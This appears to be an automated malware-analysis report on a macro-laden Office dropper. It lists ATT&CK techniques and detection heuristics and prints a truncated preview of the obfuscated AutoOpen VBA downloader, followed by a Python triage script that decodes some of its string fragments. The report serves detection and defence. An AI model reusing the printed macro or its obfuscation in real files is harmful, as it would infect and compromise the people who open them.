Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying a VBA project whose AutoOpen routine runs as soon as the document is opened. The macro calls Shell() (flagged by the OLE_VBA_SHELL heuristic as a critical execution indicator) and, in the recovered source, dispatches through Application.Run to a function that assembles its payload from reversed, fragmented string literals, behaviour consistent with a downloader that fetches and executes a second-stage payload. The ClamAV signature name Img.Dropper.PhishingLure-6443153-0 independently classifies the file as a dropper for malicious content.
Heuristics (7)
- ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Note: this rule fired even though olevba did recover the VBA project listed under Extracted artifacts below, so treat it as redundant with the VBA findings above rather than as separate evidence.)
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier present in any document with drawing content; it is not a network indicator.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25403 bytes | fb98126e44f2dad2592840e64b27d66e3f881548b71998b0317eebac775131ac |
Script preview (first 1,000 lines of the extracted script):
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VEKzcvHw"
Sub AutoOpen()
On Error Resume Next
mNBPsmccm = LbDAmKizqIY - hQRJOUIfhNmmCV / (5504078 + TrnOmlM - 985303 + TFicGGQw)
ojkziXITG = zpQwQhjfzVKMvE - zuOiDaHV / (7670615 + psElTfufo - 2891835 + wVpwvaGuo)
ckjllctpD = pTcjapcufq - jHpzBYZiH / (9941246 + bzmFMTA - 8292892 + FcSZwTmPGSjb)
Application.Run "HZwrdPKCdbjNZv", TXMbNoW
EYvdqnjET = vWosdzUd - uoEJDoPA / (6532582 + KcpTYXaqcVfQ - 7519149 + whvkDqouc)
JlnzProbn = RJiGDPV - GrIdiBm / (2103423 + tfwrzPzfhl - 4549343 + wousOVJU)
End Sub
Function TXMbNoW()
On Error Resume Next
rilCunsAlQ = nUijSszJO - aRmMaYGzwnIdR / (7163410 + rCiBJRpjQv - 3671201 + UGbpiMtMqGXU)
BUCXGw = izuHJJCwM - qVHEZklVQGr / (7273068 + XzZRXYjkfKniT - 9064750 + HlQkHfkUbH)
huDuw = bEkGNXsEWK - sfYjpLKUaFpM / (2849633 + qGiNmcwJDwb - 62158 + wPlPYPXtlM)
MnItsTz = sjunkwsu + Mid(StrReverse("qXFvnlpRnVHwEzQLHijITTsIGlCMQ2I+Q2II'+'(QtrelQ2I+Q2IVGKIQ2I+Q2IFdQ2I+Q2IaQ2I+Q2IOVGKlQ2I+Q2InWVGKoDQ2I+Q2IQQ2Izizlh"), 6, 82)
uGcXp = OrkhljbbF - nOFoqRzrlFuDX / (2497707 + rcpKiivaw - 4459919 + ohlJJkWAmv)
plCcFpGrbh = sXVvirR - LTXOtGlRWK / (8375378 + GRSdPFbvJhWaX - 8258837 + RpnADIbLEQTs)
qQUFY = XTzpvHu - FsjYQVNiwwr / (482999 + UbjKnffFOM - 9240903 + XXphhfPwH)
NQhQZ = pZJGhOmsVcW + Mid(StrReverse("ACvZUwiZTBXqXiAoSYvD+Azs2Isecorp-draAzs+AzsobQ2HwsUzwGiSDvICVPiS"), 18, 27)
FKWft = cpjDrQfHcO - qfkLszXzPR / (5304418 + PHiciAr - 3293065 + HsUXrUzQCY)
WUlrC = ilVRWQupqkrCA - QvNowGkzwjnQ / (7646715 + dajNtoX - 5784241 + NFSGBaoPpTna)
iCiKXnPDIFT = kcGRCknmdG - tMQDiJMMmJA / (6679573 + AiWJTwwAaEp - 703154 + clnqzjwp)
KUVoLtAQL = zGbnnOhH + Mid(StrReverse("hClkCOjcjnWwjlXzLOQjmAKuCrwK"), 10, 3)
klqBJAj = jtcQUNdSf - cSHaAXhb / (4867195 + JQjontMZiRpZmp - 1156478 + iLRZNhDo)
XCaZi = uhkkNzjBs - TJncaAD / (6881179 + UCjSUqsVK - 9898343 + cNvbtMcpVSJY)
HsqChlOBwBE = jmzriqYJzqTKOO - tUdWBJdFO / (2367607 + OYOOvLilihqB - 7455800 + aYfXbQfzMv)
GMfbkmAoCb = pKkkjHao + Mid(StrReverse("NNdUKwtjUKBhCOcEWKahLasqBiCrAHc[+38]rAHc[((ecALPEr.)WVT+mSLKaYJD"), 9, 29)
MVQoGnj = zbAujuIjcji - TqCblwi / (7605659 + DRLTNGYHBcAFWn - 8435730 + dvcTjDRirhw)
WYXDrOcC = vzIwzjvKobVo - ZaEizwDKBHCG / (3934895 + AzhbfIoM - 390521 + CInrhlCanj)
cilvrzbcKZ = cNwuluat - GrcXuLHzpjvNY / (6996229 + pILdPEbSkBY - 7396586 + huNOSJNKfQwW)
DbqqqkE = omWkGhk + Mid(StrReverse("wII Q2I+Q2I=Q2I+Q2I Q2I+Q2IUYYYGI;Q2I+Q2ImodnQ'+'2I+Q2'+'IarQ2I+Q2I )HjStHjQ2IWV'+'T+WVT+QslaOfwDQHcwIvmokI"), 18, 88)
HhkUfwQEis = iniYsWWYVSvShu - XVKsPHlCr / (2262846 + DUJVcRfRoWilnu - 5045551 + IkooHCoFuukTps)
vqTNSY = nMvSBPApinPG - ojXwoJcSCXpAf / (711233 + ihLcvlvYrbY - 6630150 + uJArwwRK)
uQXOB = lifPTkpGRV - ZGzbnKHs / (2105404 + WQbUXsWwEjm - 3191811 + vhwjRLjl)
JWKTCwlVo = CkHozDcQEci + Mid(StrReverse("bCdIoCsi) )Azs+Azs63]rAHc[]gniRTS[,)98'+']rAHc[+17]rAHc[+37]rAHc[((ecALPEr.)29]rAHc[]gniRTS[,)Azs+Azs67]rAHWVT+WVTc[+9WVT+WVT7]rAHc[Azs+Azs+7'+'7]rAHc[((ecALPEr.)43WVT+'+'WVT]rAHc[]gAzs+AzsniRTSWVT+'+'WpslJjsloMRCZ"), 13, 194)
wpcZQnK = YzrONDvvrTHNm - IvCtqiphbu / (2503279 + EljjzuRvN - 3282357 + jTskWTQdwQ)
TbalwmPzBY = asKfMHwrXwBzzJ - KVNvqLra / (4156843 + wtTNLRQzGKr - 4243615 + iKwWtYiUt)
pLizRO = KJuQAZmjRoF - OfdMfkBtz / (3919772 + DilupwCrFESIE - 3235902 + QYTbZhM)
JHILm = CXjnMZDm + Mid(StrReverse("JuUZBJRQ2I+Q2IQIjGQ2I+Q2I/Q2I+Q2ImQ2I+Q2IocWVT+WVT.noitarotserQ2WVTAzs+Azs+'+'WVTI+Q2IzITzwadjwZfaoBZ"), 16, 79)
iVArNblF = qlOiwkPzzJ - WZviUdZXuHrLpd / (9411970 + JznFqSkaP - 485972 + WqJjNKAuTkOZp)
tMlPUTG = DvMzZYBzSFA - EFEoVORk / (504849 + lXdBpjdhuXzf - 7472423 + XaqisXYEjA)
lDvYrBl = upiOAIE - WKoVYiRWlK / (5516889 + ZSjRuXnsf - 1712409 + ocvutwSuPsHP)
KKshBUrGXs = vQsjstSzbq + Mid(StrReverse("BwGWVT69Azs+Azs]rAHc[]gniRTS[,)68]rA'+'Hc[+17]rAHc[+57]rWVT+WVTAHc[((ecA'+'LPEr'+'.)Q2I}Q2I+Q2I}{Azs+A'+'zsQ2I
```
... (truncated)
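The heuristics above pair an auto-execution token with execution tokens, and the preview shows the other half of the picture: dead arithmetic padding around a handful of `Mid(StrReverse("..."), start, len)` calls that each yield one slice of a reversed, seam-obfuscated string. The script below is an added triage example, not the analyzer's or the sample's own code. It parses an excerpt copied from the preview, evaluates the `Mid`/`StrReverse` slices exactly as VBA would, and then strips the concatenation seams. The helper names (`triage`, `decode_fragments`, `strip_seams`, `vba_mid`), the regex token lists, and in particular the treatment of `I2Q`, `szA`, `TVW` as quote placeholders and `KGV` as inserted noise are assumptions made by inspecting the fragments; the macro's real substitution step and the order in which the fragments are joined are in the truncated part of the source and are not reconstructed here.

```python
import re

# Constructed excerpt: the AutoOpen entry point and four of the
# Mid(StrReverse("...")) assignments copied from the macros.bas preview on
# this page, with the arithmetic padding lines omitted.  The text is only
# parsed here, never executed.
MACRO_EXCERPT = r'''
Sub AutoOpen()
On Error Resume Next
Application.Run "HZwrdPKCdbjNZv", TXMbNoW
End Sub
Function TXMbNoW()
On Error Resume Next
MnItsTz = sjunkwsu + Mid(StrReverse("qXFvnlpRnVHwEzQLHijITTsIGlCMQ2I+Q2II'+'(QtrelQ2I+Q2IVGKIQ2I+Q2IFdQ2I+Q2IaQ2I+Q2IOVGKlQ2I+Q2InWVGKoDQ2I+Q2IQQ2Izizlh"), 6, 82)
KUVoLtAQL = zGbnnOhH + Mid(StrReverse("hClkCOjcjnWwjlXzLOQjmAKuCrwK"), 10, 3)
GMfbkmAoCb = pKkkjHao + Mid(StrReverse("NNdUKwtjUKBhCOcEWKahLasqBiCrAHc[+38]rAHc[((ecALPEr.)WVT+mSLKaYJD"), 9, 29)
DbqqqkE = omWkGhk + Mid(StrReverse("wII Q2I+Q2I=Q2I+Q2I Q2I+Q2IUYYYGI;Q2I+Q2ImodnQ'+'2I+Q2'+'IarQ2I+Q2I )HjStHjQ2IWV'+'T+WVT+QslaOfwDQHcwIvmokI"), 18, 88)
End Function
'''

# Auto-execution entry points and execution/download tokens: the same kind of
# pairing the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic describes (token lists are
# this example's own, not the analyzer's).
AUTOEXEC_RE = re.compile(
    r"\b(AutoOpen|AutoExec|AutoClose|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
EXEC_RE = re.compile(
    r"\b(Shell|Application\.Run|CreateObject|GetObject|CallByName|"
    r"URLDownloadToFile|WScript\.Shell)\b", re.I)

# One assignment of the form   var = noise + Mid(StrReverse("literal"), start, len)
MID_RE = re.compile(
    r'(\w+)\s*=\s*\w+\s*\+\s*Mid\(StrReverse\("([^"]*)"\),\s*(\d+),\s*(\d+)\)')

# ASSUMPTION (by inspection of the fragments): I2Q / szA / TVW sit around the
# '+' concatenation seams and stand in for a quote character; KGV is inserted
# noise that is simply dropped.
QUOTE_TOKENS = ("I2Q", "szA", "TVW")
NOISE_TOKENS = ("KGV",)


def triage(src):
    """Return (auto-exec names, execution tokens) found in VBA source text."""
    autoexec = sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}, key=str.lower)
    execs = sorted({m.group(1) for m in EXEC_RE.finditer(src)}, key=str.lower)
    return autoexec, execs


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, clipped at end of string like VBA does."""
    if start < 1:
        raise ValueError("VBA Mid start must be >= 1")
    return s[start - 1:start - 1 + length]


def decode_fragments(src):
    """Evaluate each Mid(StrReverse("...")) assignment; returns [(var, slice)]."""
    # StrReverse on a VBA literal is a plain character reversal (the literals
    # here contain no doubled-quote escapes, so no unescaping is needed).
    return [(var, vba_mid(lit[::-1], int(start), int(length)))
            for var, lit, start, length in MID_RE.findall(src)]


def strip_seams(frag):
    """Collapse '+' seams and placeholder tokens to expose readable text."""
    prev = None
    while prev != frag:              # seams and tokens nest; iterate to a fixed point
        prev = frag
        frag = frag.replace("'+'", "")
        for tok in QUOTE_TOKENS:
            frag = frag.replace(tok, "'")
    for tok in NOISE_TOKENS:
        frag = frag.replace(tok, "")
    return frag


if __name__ == "__main__":
    auto, execs = triage(MACRO_EXCERPT)
    print("auto-exec:", auto, "| execution tokens:", execs)
    for var, raw in decode_fragments(MACRO_EXCERPT):
        print(f"{var:12} raw={raw!r}")
        print(f"{'':12} cleaned={strip_seams(raw)!r}")
```

On the excerpt this reports `AutoOpen` paired with `Application.Run`, and the cleaned slices surface PowerShell-style tokens such as `DoWnlOadFIle`, `.rEPLAce(([cHAr]83+[cHAr`, and `random`. Those are triage evidence for a download-and-execute stager, consistent with the Shell() and dropper findings above; the full command line cannot be rebuilt from the preview alone, because the fragment ordering and the final `.replace()` substitutions live in the truncated part of the macro.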